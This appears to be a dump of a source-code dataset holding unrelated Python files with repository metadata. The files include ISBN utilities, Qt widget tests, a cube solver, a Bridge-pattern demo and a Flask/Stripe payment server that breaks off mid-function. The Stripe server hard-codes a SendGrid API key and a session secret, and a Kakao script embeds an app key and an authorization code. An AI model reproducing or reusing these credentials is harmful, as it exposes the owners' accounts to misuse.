+-- UserWarning
+-- FutureWarning
+-- ImportWarning
+-- UnicodeWarning
+-- BytesWarning
+-- ResourceWarning
"""
class ConfigFileNotFoundError(FileNotFoundError):
    """
    The config file was not found.
    """
class RequireArgumentError(Exception):
    """
    A required argument is missing.
    """
class FatalError(Exception):
    """Fatal error: the program needs to shut down immediately.

    Fixed to inherit from Exception -- the original bare class could not
    be raised or caught as an exception.
    """
class NotIntegerError(ValueError):
    """Raised when the input must be an integer."""
class NotFloatError(ValueError):
    """Raised when the input must be a float."""
class OutOfRangeError(ValueError):
    """Raised when the input falls outside the required range."""
class OutOfChoiceError(ValueError):
    """Raised when the parameter is not one of the given choices."""
class NotSupportedWarning(UserWarning):
    """This feature is not supported; the program will ignore it."""
class UnDefinedError(Exception):
    """Not-yet-classified error; details to be added later.

    Fixed to inherit from Exception -- the original bare class could not
    be raised or caught as an exception.
    """
class GuessFailed(Warning):
    """
    A guess operation performed by your function failed; this is a warning.
    """
| 23.858407 | 80 | 0.554154 | 848 | 0.313146 | 0 | 0 | 0 | 0 | 0 | 0 | 2,294 | 0.84712 |
17b1221ef72aae7747a03fca3ca613968d0d4959 | 3,386 | py | Python | catbridge_tools/isbn_tools.py | victoriamorris/CatBridge | a91164f85ffcb93eb17c786d4a178a559242f7c9 | [
"MIT"
] | null | null | null | catbridge_tools/isbn_tools.py | victoriamorris/CatBridge | a91164f85ffcb93eb17c786d4a178a559242f7c9 | [
"MIT"
] | null | null | null | catbridge_tools/isbn_tools.py | victoriamorris/CatBridge | a91164f85ffcb93eb17c786d4a178a559242f7c9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ====================
# Set-up
# ====================
# Import required modules
import re
__author__ = 'Victoria Morris'
__license__ = 'MIT License'
__version__ = '1.0.0'
__status__ = '4 - Beta Development'
# ====================
# Regular expressions
# ====================
RE_ISBN10 = re.compile(r'\b(?=(?:[0-9]+[\- ]?){10})[0-9]{9}[0-9X]\b|'
r'\b(?=(?:[0-9]+[\- ]?){13})[0-9]{1,5}[\- ][0-9]+[\- ][0-9]+[\- ][0-9X]\b')
RE_ISBN13 = re.compile(r'\b97[89][0-9]{10}\b|'
r'\b(?=(?:[0-9]+[\- ]){4})97[89][\- 0-9]{13}[0-9]\b')
# ====================
# Classes
# ====================
class Isbn(object):
def __init__(self, content):
self.isbn = re.sub(r'X(?!$)', '', re.sub(r'[^0-9X]', '', content.upper()))
def __str__(self):
return self.isbn
def trim(self):
if len(self.isbn) > 13:
self.isbn = self.isbn[:13]
if 10 < len(self.isbn) < 13:
self.isbn = self.isbn[:10]
def convert(self):
if is_isbn_10(self.isbn):
self.isbn = isbn_convert(self.isbn)
# ====================
# Functions
# ====================
def isbn_10_check_digit(nine_digits):
"""Function to get the check digit for a 10-digit ISBN"""
if len(nine_digits) != 9:
return None
try:
int(nine_digits)
except Exception:
return None
remainder = int(sum((i + 2) * int(x) for i, x in enumerate(reversed(nine_digits))) % 11)
if remainder == 0:
tenth_digit = 0
else:
tenth_digit = 11 - remainder
if tenth_digit == 10:
tenth_digit = 'X'
return str(tenth_digit)
def isbn_13_check_digit(twelve_digits):
"""Function to get the check digit for a 13-digit ISBN"""
if len(twelve_digits) != 12:
return None
try:
int(twelve_digits)
except Exception:
return None
thirteenth_digit = 10 - int(sum((i % 2 * 2 + 1) * int(x) for i, x in enumerate(twelve_digits)) % 10)
if thirteenth_digit == 10:
thirteenth_digit = '0'
return str(thirteenth_digit)
def isbn_10_check_structure(isbn10):
"""Function to check the structure of a 10-digit ISBN"""
return True if re.match(RE_ISBN10, isbn10) else False
def isbn_13_check_structure(isbn13):
"""Function to check the structure of a 13-digit ISBN"""
return True if re.match(RE_ISBN13, isbn13) else False
def is_isbn_10(isbn10):
"""Function to validate a 10-digit ISBN"""
isbn10 = re.sub(r'[^0-9X]', '', isbn10.replace('x', 'X'))
if len(isbn10) != 10:
return False
return False if isbn_10_check_digit(isbn10[:-1]) != isbn10[-1] else True
def is_isbn_13(isbn13):
"""Function to validate a 13-digit ISBN"""
isbn13 = re.sub(r'[^0-9X]', '', isbn13.replace('x', 'X'))
if len(isbn13) != 13:
return False
if isbn13[0:3] not in ('978', '979'):
return False
return False if isbn_13_check_digit(isbn13[:-1]) != isbn13[-1] else True
def isbn_convert(isbn10):
"""Function to convert a 10-digit ISBN to a 13-digit ISBN"""
if not is_isbn_10(isbn10):
return None
return '978' + isbn10[:-1] + isbn_13_check_digit('978' + isbn10[:-1])
| 27.754098 | 105 | 0.533077 | 475 | 0.140284 | 0 | 0 | 0 | 0 | 0 | 0 | 1,036 | 0.305966 |
17b21b596279e3ab02d31a65bd2b5613da788991 | 1,334 | py | Python | tests/test_shows_tab.py | andrsd/podcastista | c05a1de09d2820899aebe592d3d4b01d64d1e5fe | [
"MIT"
] | null | null | null | tests/test_shows_tab.py | andrsd/podcastista | c05a1de09d2820899aebe592d3d4b01d64d1e5fe | [
"MIT"
] | 17 | 2021-09-22T12:21:46.000Z | 2022-02-26T12:26:40.000Z | tests/test_shows_tab.py | andrsd/podcastista | c05a1de09d2820899aebe592d3d4b01d64d1e5fe | [
"MIT"
] | null | null | null | import platform
import pytest
from unittest.mock import MagicMock
from PyQt5 import QtWidgets
# The Qt widget tests below require a working GUI stack; this project only
# runs them on macOS (Darwin), so everything is nested under the guard.
if platform.system() == "Darwin":

    @pytest.fixture
    def widget(qtbot, main_window):
        # Build a ShowsTab wired to the shared main_window fixture and
        # register it with qtbot.
        from podcastista.ShowsTab import ShowsTab
        widget = ShowsTab(main_window)
        qtbot.addWidget(widget)
        yield widget

    def test_init(widget):
        # A freshly created tab starts with no shows loaded.
        assert widget._shows == []

    def test_show(widget):
        # The `shows` property exposes the private _shows list unchanged.
        sh = [
            1, 2, 3
        ]
        widget._shows = sh
        assert widget.shows == sh

    def test_clear(widget):
        # clear() must remove every child widget from the layout.
        widget._layout.addWidget(QtWidgets.QWidget())
        widget.clear()
        assert widget._layout.count() == 0

    def test_fill(widget):
        # Minimal Spotify "show" payload as returned by the API.
        show = {
            'id': '1234',
            'name': 'show',
            'images': [
                {'url': 'url-0'},
                {'url': 'url-1'}
            ],
            'publisher': 'publisher',
        }
        # Stub the Spotify client to report two saved shows.
        spotify = MagicMock()
        spotify.current_user_saved_shows.return_value = {
            'items': [
                {'show': show},
                {'show': show}
            ]
        }
        widget._main_window._spotify = spotify
        widget._layout = MagicMock()
        widget._layout.count.return_value = 2
        widget.fill()
        # fill() should add one widget per returned show.
        assert widget._layout.addWidget.call_count == 2
| 25.169811 | 57 | 0.530735 | 0 | 0 | 173 | 0.129685 | 193 | 0.144678 | 0 | 0 | 103 | 0.077211 |
17b2749503c2c092f3b9104e3fd3d23979721585 | 1,999 | py | Python | Solver.py | ANewDeviloper/Rubiks-Simulator | 31d06e4b5415ccf754ec91bcdd5c755e2e355d86 | [
"MIT"
] | null | null | null | Solver.py | ANewDeviloper/Rubiks-Simulator | 31d06e4b5415ccf754ec91bcdd5c755e2e355d86 | [
"MIT"
] | null | null | null | Solver.py | ANewDeviloper/Rubiks-Simulator | 31d06e4b5415ccf754ec91bcdd5c755e2e355d86 | [
"MIT"
] | null | null | null | # -*- coding: utf8 -*-
import CubeModel
methodIDs = {1 : "TLPU", 2 : "TLPD", 3 : "TVMPU", 4 : "TVMPD", 5 : "TRPU", 6 : "TRPD",
7 : "TFPR", 8 : "TFPL", 9 : "TOMPR", 10 : "TOMPL", 11 : "TBPR", 12 : "TBPL",
13 : "TUPR", 14 : "TUPL", 15 : "THMPR", 16 : "THMPL", 17 : "TDPR", 18 : "TDPL", }
def compareCubes(cube1, cube2):
ret = True
for sideKey in cube1.Content:
for pieceKey in cube1.Content.get(sideKey).Content:
if cube1.Content.get(sideKey).Content.get(pieceKey) == cube2.Content.get(sideKey).Content.get(pieceKey):
pass
else:
ret = False
return ret
def solveByTrying(cubeYouHave, cubeToGet):
counter = 0
methodArray = []
solved = False
while(solved == False):
#Update counter
counter +=1
#Generate an Array of methodIDs(as numbers)
dezimal = counter
check = True
while(check):
check = False;
Ergebnis = "";
methodArray = []
c = 0;
while(dezimal >= 18):
methodArray.append(dezimal % 18)
dezimal = (dezimal-(dezimal % 18))/18
if c > 10:
check = True
break
methodArray.append(dezimal % 18)
methodArray.reverse()
#Update cubeYouHave with methodArray
for i in range(0, len(methodArray)):
cubeYouHave.changeCube(methodIDs.get(methodArray[i]))
#Comparing
if compareCubes(cubeYouHave,cubeToGet):
solved = True
#Reset cubeYouHave
methodArray.reverse()
for i in range(0, len(methodArray)):
for d in range(0, 3):
cubeYouHave.changeCube(methodIDs.get(methodArray[i]))
if solved == True:
methodArray.reverse()
print( methodArray) #(return)
| 31.730159 | 116 | 0.50025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 286 | 0.143072 |
17b41cbaf511e453fc40d63d8ba1e2b7897da14a | 3,494 | py | Python | tests/python/contrib/test_ethosu/cascader/test_ethosu_conv2d_matcher.py | LEA0317/incubator-tvm | de21c8f2ef507587fdcc99b851404de5aeeb5a16 | [
"Apache-2.0"
] | 90 | 2021-11-30T11:58:10.000Z | 2022-03-31T02:24:04.000Z | tests/python/contrib/test_ethosu/cascader/test_ethosu_conv2d_matcher.py | LEA0317/incubator-tvm | de21c8f2ef507587fdcc99b851404de5aeeb5a16 | [
"Apache-2.0"
] | 64 | 2021-11-22T23:58:23.000Z | 2022-03-31T03:19:22.000Z | tests/python/contrib/test_ethosu/cascader/test_ethosu_conv2d_matcher.py | LEA0317/incubator-tvm | de21c8f2ef507587fdcc99b851404de5aeeb5a16 | [
"Apache-2.0"
] | 27 | 2021-12-09T22:39:27.000Z | 2022-03-24T23:21:48.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
pytest.importorskip("ethosu.vela")
from tvm import te
import tvm.contrib.ethosu.cascader as cs
from tvm.relay.backend.contrib.ethosu.te.convolution import match_ethosu_conv2d, conv2d_compute
from .infra import make_matrices
@pytest.mark.parametrize("kernel", [(3, 3), (2, 1), (3, 5)])
@pytest.mark.parametrize("stride", [(1, 1), (2, 1), (3, 2)])
@pytest.mark.parametrize("dilation", [(1, 1), (2, 1), (3, 2)])
@pytest.mark.parametrize("padding", [(0, 0, 0, 0), (3, 2, 3, 2), (2, 1, 0, 1)])
@pytest.mark.parametrize("ifm_channels", [8, 57])
@pytest.mark.parametrize("ifm_layout", ["NHWC", "NHCWB16"])
@pytest.mark.parametrize("ofm_layout", ["NHWC", "NHCWB16"])
def test_ethosu_conv2d_matcher(
    kernel, stride, dilation, padding, ifm_channels, ifm_layout, ofm_layout
):
    """Check that match_ethosu_conv2d recognises a conv2d compute and builds
    an EthosuPart whose three propagators (IFM, weights, scale/bias) carry
    the transform matrices and offsets expected by make_matrices."""
    if ifm_layout == "NHWC":
        ifm_shape = (1, 12, 15, ifm_channels)
    else:
        # NHCWB16 packs channels into blocks of 16: (N, H, ceil(C/16), W, 16).
        ifm_shape = (1, 12, 1 + ((ifm_channels - 1) // 16), 15, 16)
    ofm_channels = 8

    kernel_h, kernel_w = kernel
    # Placeholder tensors for the conv2d compute graph under test.
    ifm = te.placeholder(ifm_shape, dtype="int8")
    weight = te.placeholder((ofm_channels, kernel_h, kernel_w, ifm_channels), dtype="int8")
    scale_bias = te.placeholder((ofm_channels, 10), dtype="uint8")
    lut = te.placeholder((), dtype="uint8")
    out = conv2d_compute(
        ifm=ifm,
        weight=weight,
        scale_bias=scale_bias,
        lut=lut,
        ifm_scale=1,
        ifm_zero_point=0,
        ofm_scale=1,
        ofm_zero_point=0,
        weight_zero_point=0,
        strides=stride,
        padding=padding,
        dilation=dilation,
        activation="NONE",
        clip_min=0,
        clip_max=0,
        upscale="NONE",
        rounding_mode="TFL",
        ifm_layout=ifm_layout,
        ofm_layout=ofm_layout,
    )
    # Reference transform matrices / offsets for the same configuration.
    (
        ifm_transform,
        ifm_offset,
        weight_transform,
        weight_offset,
        scale_bias_transform,
        scale_bias_offset,
    ) = make_matrices(
        "ethosu_conv2d",
        kernel,
        stride,
        padding,
        ifm_layout,
        ofm_layout,
        dilation,
        ifm_channels,
        ofm_channels,
    )

    device_config = cs.EthosuDeviceConfig("ethos-u55-256")
    part = match_ethosu_conv2d(out, device_config)

    assert isinstance(part, cs.EthosuPart)
    # Propagator order: [0] IFM, [1] weights, [2] scale/bias.
    assert len(part.propagators) == 3
    assert part.propagators[0].transform == ifm_transform
    assert part.propagators[0].offset == ifm_offset
    assert part.propagators[1].transform == weight_transform
    assert part.propagators[1].offset == weight_offset
    assert part.propagators[2].transform == scale_bias_transform
    assert part.propagators[2].offset == scale_bias_offset
if __name__ == "__main__":
    # Allow running this test module directly with the Python interpreter.
    pytest.main([__file__])
| 33.92233 | 95 | 0.670864 | 0 | 0 | 0 | 0 | 2,408 | 0.689181 | 0 | 0 | 974 | 0.278764 |
17b4c6a525923c76105b1e66c532efc33cd33653 | 23 | py | Python | __init__.py | mendhak/aws-elb-logster | 4122f03fd3977225269190fff60fd5d7935ddeaf | [
"MIT"
] | 2 | 2015-09-14T22:16:52.000Z | 2016-04-11T17:08:32.000Z | __init__.py | mendhak/aws-elb-logster | 4122f03fd3977225269190fff60fd5d7935ddeaf | [
"MIT"
] | null | null | null | __init__.py | mendhak/aws-elb-logster | 4122f03fd3977225269190fff60fd5d7935ddeaf | [
"MIT"
] | null | null | null | #
# Python init file
#
| 5.75 | 18 | 0.608696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 20 | 0.869565 |
17b5611d8bfcc949adaf08263c632359cd3eeee4 | 1,925 | py | Python | tests/testing_support/validators/validate_serverless_payload.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | [
"Apache-2.0"
] | 92 | 2020-06-12T17:53:23.000Z | 2022-03-01T11:13:21.000Z | tests/testing_support/validators/validate_serverless_payload.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | [
"Apache-2.0"
] | 347 | 2020-07-10T00:10:19.000Z | 2022-03-31T17:58:56.000Z | tests/testing_support/validators/validate_serverless_payload.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | [
"Apache-2.0"
] | 58 | 2020-06-17T13:51:57.000Z | 2022-03-06T14:26:53.000Z | # Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from newrelic.common.encoding_utils import (serverless_payload_decode,
json_decode)
from newrelic.common.object_wrapper import (
transient_function_wrapper,
function_wrapper)
def validate_serverless_payload(count=1):
    """Decorator factory for tests: assert that exactly ``count`` serverless
    payloads are finalized while the wrapped callable runs, and that each is
    a valid ``[1, 'NR_LAMBDA_MONITORING', <encoded>]`` envelope whose decoded
    body contains only the ``metadata`` and ``data`` keys.

    :param count: expected number of finalized payloads (default 1).
    """
    @function_wrapper
    def _validate_wrapper(wrapped, instance, args, kwargs):
        payloads = []

        # Intercept ServerlessModeSession.finalize for the duration of the
        # wrapped call and record every payload it produces.
        @transient_function_wrapper('newrelic.core.data_collector',
                'ServerlessModeSession.finalize')
        def _capture(wrapped, instance, args, kwargs):
            payload = wrapped(*args, **kwargs)
            payloads.append(payload)
            return payload

        def _validate():
            assert len(payloads) == count
            for payload in payloads:
                assert isinstance(payload, str)

                obj = json_decode(payload)
                assert len(obj) == 3, obj

                assert obj[0] == 1  # Version = 1
                assert obj[1] == 'NR_LAMBDA_MONITORING'  # Marker

                decoded = serverless_payload_decode(obj[2])

                # BUG FIX: this comparison was previously evaluated and
                # discarded; it must be asserted to actually validate that
                # keys only contain metadata / data.
                assert set(decoded.keys()) == set(('metadata', 'data'))

        capture_wrapped = _capture(wrapped)
        result = capture_wrapped(*args, **kwargs)
        _validate()
        return result

    return _validate_wrapper
| 32.627119 | 74 | 0.648831 | 0 | 0 | 0 | 0 | 1,065 | 0.553247 | 0 | 0 | 730 | 0.379221 |
17b5722e5e60de2426f1160b8b162178106fdd0c | 890 | py | Python | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | import token_def
# To get Authorization Code
# https://kauth.kakao.com/oauth/authorize?client_id=cc335daa766cc74b3de1b1c372a6cce8&response_type=code&redirect_uri=https://localhost.com
KAKAO_APP_KEY = "cc335daa766cc74b3de1b1c372a6cce8" # REST_API app key
AUTHORIZATION_CODE = "flzXSvhelQ3LLzmAKyo5-bQsafEyGOyFAMyK4N-dTii5B-SxG3-KimikA5vq0zD1ChZ_jQo9dVsAAAF8OjRb-g" # once in a run
KAKAO_TOKEN_FILENAME = "/Users/jeongwon/Documents/GitHub/project_news_summarize/json/kakao_token.json" # Token in this file(.json)
# To get Access Token
tokens = token_def.request_tokens(KAKAO_APP_KEY, AUTHORIZATION_CODE)
# To save Access Token in the file(.json)
token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
# # To update Refresh Token after the Access Token is expired
# tokens=token_def.update_tokens(KAKAO_APP_KEY, KAKAO_TOKEN_FILENAME)
# token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
| 46.842105 | 138 | 0.830337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 671 | 0.753933 |
17b8f007031e6b77982d4da9880cd3ac7fe940b3 | 1,717 | py | Python | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from bxcommon.test_utils.abstract_test_case import AbstractTestCase
from bxcommon import constants
from bxcommon.messages.bloxroute.abstract_bloxroute_message import AbstractBloxrouteMessage
from bxcommon.messages.bloxroute.bloxroute_message_control_flags import BloxrouteMessageControlFlags
class TestAbstractBloxrouteMessage(AbstractTestCase):
    """Framing and control-flag round-trip checks for AbstractBloxrouteMessage."""

    def test_asbstract_bloxroute_message(self):
        # NOTE(review): "asbstract" typo kept -- renaming would change test ids.
        total_msg_len = 1000
        msg_type = b"dummy_msg"
        # Payload excludes the common header and the starting-sequence bytes.
        payload_len = total_msg_len - constants.BX_HDR_COMMON_OFF - constants.STARTING_SEQUENCE_BYTES_LEN
        buffer = bytearray(total_msg_len)

        message = AbstractBloxrouteMessage(msg_type=msg_type, payload_len=payload_len, buf=buffer)
        raw_bytes = message.rawbytes()

        self.assertEqual(total_msg_len, len(raw_bytes))
        self.assertEqual(msg_type, message.msg_type())
        self.assertEqual(payload_len, message.payload_len())
        self.assertEqual(payload_len, len(message.payload()))

        # VALID is present after construction, can be cleared and re-set.
        self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))

        message.remove_control_flag(BloxrouteMessageControlFlags.VALID)
        self.assertFalse(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))

        message.set_control_flag(BloxrouteMessageControlFlags.VALID)
        self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))

        # Setting an already-set flag is a no-op.
        message.set_control_flag(BloxrouteMessageControlFlags.VALID)
        self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
| 50.5 | 121 | 0.798486 | 1,422 | 0.828189 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.023879 |
17bab85be9766c1e62d10b8ba5e92bbbc7204442 | 1,139 | py | Python | test/python/LIM2Metrics/py3/base/common/Bridge/Bridge.py | sagodiz/SonarQube-plug-in | 4f8e111baecc4c9f9eaa5cd3d7ebeb1e365ace2c | [
"BSD-4-Clause"
] | 20 | 2015-06-16T17:39:10.000Z | 2022-03-20T22:39:40.000Z | test/python/LIM2Metrics/py3/base/common/Bridge/Bridge.py | sagodiz/SonarQube-plug-in | 4f8e111baecc4c9f9eaa5cd3d7ebeb1e365ace2c | [
"BSD-4-Clause"
] | 29 | 2015-12-29T19:07:22.000Z | 2022-03-22T10:39:02.000Z | test/python/LIM2Metrics/py3/base/common/Bridge/Bridge.py | sagodiz/SonarQube-plug-in | 4f8e111baecc4c9f9eaa5cd3d7ebeb1e365ace2c | [
"BSD-4-Clause"
] | 12 | 2015-08-28T01:22:18.000Z | 2021-09-25T08:17:31.000Z | # Implementor
class drawing_api:
def draw_circle(self, x, y, radius):
pass
# ConcreteImplementor 1/2
class drawing_api1(drawing_api):
    """Drawing backend that renders through the "API1" engine."""

    def draw_circle(self, x, y, radius):
        # Same trace as before: fixed-point (6 decimal) coordinates.
        print('API1.circle at {0:f}:{1:f} radius {2:f}'.format(x, y, radius))
# ConcreteImplementor 2/2
class drawing_api2(drawing_api):
    """Drawing backend that renders through the "API2" engine."""

    def draw_circle(self, x, y, radius):
        # Same trace as before: fixed-point (6 decimal) coordinates.
        print('API2.circle at {0:f}:{1:f} radius {2:f}'.format(x, y, radius))
# Abstraction
class Shape:
    """Abstraction of the Bridge pattern; refined abstractions override both methods."""

    def draw(self):
        # Overridden by refined abstractions (e.g. CircleShape).
        pass

    def resize_by_percentage(self, pct):
        # Overridden by refined abstractions.
        pass
# Refined Abstraction
class CircleShape(Shape):
    """A circle that delegates its rendering to a pluggable drawing backend."""

    def __init__(self, x, y, radius, drawing_api):
        self.x, self.y = x, y
        self.radius = radius
        self.drawing_api = drawing_api

    def draw(self):
        # Bridge in action: the backend decides how the circle is rendered.
        backend = self.drawing_api
        backend.draw_circle(self.x, self.y, self.radius)

    def resize_by_percentage(self, pct):
        # Scale the radius by the given factor (e.g. 2.5 -> 250% of original).
        self.radius = self.radius * pct
# Client
if __name__ == '__main__':
    # Demo: the same abstraction (CircleShape) drawn through two backends.
    shapes = [
        CircleShape(1, 2, 3, drawing_api1()),
        CircleShape(5, 7, 11, drawing_api2())
    ]

    for shape in shapes:
        shape.resize_by_percentage(2.5)
        shape.draw()
| 23.729167 | 65 | 0.62072 | 785 | 0.689201 | 0 | 0 | 0 | 0 | 0 | 0 | 179 | 0.157155 |
17bb9ce8b0c4820397f46ae9b7245ef217260243 | 6,162 | py | Python | server/main.py | priyanshujha98/leilaportal | 2f4f51173b0186b07e4c14fc06a2ecc715cf7eb7 | [
"MIT"
] | null | null | null | server/main.py | priyanshujha98/leilaportal | 2f4f51173b0186b07e4c14fc06a2ecc715cf7eb7 | [
"MIT"
] | null | null | null | server/main.py | priyanshujha98/leilaportal | 2f4f51173b0186b07e4c14fc06a2ecc715cf7eb7 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3.6
"""
server.py
Stripe Sample.
Python 3.6 or newer required.
"""
import stripe
import json
import os
import requests
#flask
from flask import Flask, render_template, jsonify, request, send_from_directory, session, Session
from flask_session import Session
from dotenv import load_dotenv, find_dotenv
# Sendgrid
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
# Setup Stripe python client library from environment (.env) configuration.
load_dotenv(find_dotenv())
stripe.api_key = os.getenv('STRIPE_SECRET_KEY')
stripe.api_version = os.getenv('STRIPE_API_VERSION')

# Static assets and templates are served from the same directory (STATIC_DIR).
static_dir = str(os.path.abspath(os.path.join(
    __file__, "..", os.getenv("STATIC_DIR"))))
app = Flask(__name__, static_folder=static_dir,
            static_url_path="", template_folder=static_dir)
# Server-side sessions stored on the filesystem.
SESSION_TYPE = 'filesystem'
app.config.from_object(__name__)
# SECURITY(review): the session secret key is hard-coded; load it from the
# environment before deploying.
app.secret_key = b'ilnzdfsdf'
# app.config['SERVER_NAME'] = 'requests.drleilamasson.com'
app.config['SECRET_KEY'] = b'ilnzdfsdf'
Session(app)
@app.route('/', methods=['GET'])
def get_example():
    """Render the landing page; prints session info for debugging."""
    print(session.sid)
    try:
        print(session['patient'])
    except Exception as e:
        # Best-effort debug logging only: 'patient' may not be set yet.
        print(e)
    return render_template('index.html')
@app.route('/config', methods=['GET'])
def get_publishable_key():
    """Expose client-side Stripe configuration (publishable key, price, currency)."""
    return jsonify({
        'publicKey': os.getenv('STRIPE_PUBLISHABLE_KEY'),
        'basePrice': os.getenv('BASE_PRICE'),
        'currency': os.getenv('CURRENCY')
    })
# Fetch the Checkout Session to display the JSON result on the success page
@app.route('/checkout-session', methods=['GET'])
def get_checkout_session():
    """Retrieve the completed Checkout Session and e-mail the doctor the
    request details that were stashed in the server-side session."""
    print("Attempting to send emaill beep")
    #TODO: if session[patient] != 0, to ensure security
    id = request.args.get('sessionId')
    checkout_session = stripe.checkout.Session.retrieve(id)
    print(session.sid)
    print("with get: ", session.get('patient', 'NULL/notset'))
    # print('check:, ' + session['patient'])
    # Build the notification e-mail from session-stored request details.
    message = Mail(
        from_email='manummasson8@gmail.com',
        to_emails='manummasson8@gmail.com',
        subject='New request for ' + session.get('medication', 'NULL/notset') + ' by ' + session.get('patient', 'NULL/notset'),
        html_content='<li><h2>From: </h2>' + session.get('patient', 'NULL/notset') + "at " + session.get('email', 'NULL/notset') + ', ' + session.get('phone', 'NULL/notset') +'</li>'
        + '<li><h2>Medication: </h2><h3>' + session.get('medication', 'NULL/notset') + '</h3></li>'
        + '<li><h2>Pharmacy: </h2><h3>' + session.get('pharmacy', 'NULL/notset') + '</h3></li>'
        + '<li><h2>Notes: </h2> <h3>' + session.get('notes', 'NULL/notset') + '</h3></li>'
    )
    try:
        # SECURITY(review): the SendGrid API key is hard-coded below; it should
        # be rotated and loaded from the environment (SENDGRID_API_KEY).
        sg = SendGridAPIClient('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')
        response = sg.send(message)
        print(response.status_code)
        print(response.body)
        print(response.headers)
    except Exception as e:
        # Best-effort: e-mail failure does not block returning the session.
        print(e)
    # session['patient'] = 0
    print("Test?")
    return jsonify(checkout_session)
@app.route('/create-checkout-session', methods=['POST'])
def create_checkout_session():
    """Create a Stripe Checkout Session for the posted order.

    Expects a JSON body with patient details (patient, email, phone,
    medication, pharmacy, notes) plus a line-item ``quantity``.  Details are
    stashed in the server-side session so they can be e-mailed after Stripe
    redirects back to the success page.

    Returns:
        JSON ``{"sessionId": ...}`` on success, or ``{"error": ...}`` with
        HTTP 403 on failure.
    """
    data = json.loads(request.data)
    domain_url = os.getenv('DOMAIN')

    try:
        # Create new Checkout Session for the order
        # Other optional params include:
        # [billing_address_collection] - to display billing address details on the page
        # [customer] - if you have an existing Stripe Customer ID
        # [payment_intent_data] - lets capture the payment later
        # [customer_email] - lets you prefill the email input in the form
        # For full details see https://stripe.com/docs/api/checkout/sessions/create

        # ?session_id={CHECKOUT_SESSION_ID} means the redirect will have the session ID set as a query param
        print(data)
        session['patient'] = data['patient']
        session['email'] = data['email']
        session['phone'] = data['phone']
        session['medication'] = data['medication']
        session['pharmacy'] = data['pharmacy']
        session['notes'] = data['notes']
        print("no get: ", session['patient'])
        print("with get: ", session.get('patient', 'NULL/notset'))
        session.modified = True
        checkout_session = stripe.checkout.Session.create(
            success_url=domain_url +
            "/success.html?session_id={CHECKOUT_SESSION_ID}",
            cancel_url=domain_url + "/canceled.html",
            payment_method_types=["card"],
            line_items=[
                {
                    "name": "Script",
                    "quantity": data['quantity'],
                    "currency": os.getenv('CURRENCY'),
                    "amount": os.getenv('BASE_PRICE')
                }
            ]
        )
        return jsonify({'sessionId': checkout_session['id']})
    except Exception as e:
        print("ERRROR", e)
        # BUG FIX: was ``return jsonify(e), 40`` -- 40 is not a valid HTTP
        # status code and jsonify() cannot serialise an exception object.
        # Return the message with 403, as in Stripe's official sample.
        return jsonify(error=str(e)), 403
@app.route('/webhook', methods=['POST'])
def webhook_received():
    """Stripe webhook endpoint: verifies the event signature (when a webhook
    secret is configured) and logs completed checkout sessions."""
    # You can use webhooks to receive information about asynchronous payment events.
    # For more about our webhook events check out https://stripe.com/docs/webhooks.
    webhook_secret = os.getenv('STRIPE_WEBHOOK_SECRET')
    request_data = json.loads(request.data)

    if webhook_secret:
        # Retrieve the event by verifying the signature using the raw body and secret if webhook signing is configured.
        signature = request.headers.get('stripe-signature')
        try:
            event = stripe.Webhook.construct_event(
                payload=request.data, sig_header=signature, secret=webhook_secret)
            data = event['data']
        except Exception as e:
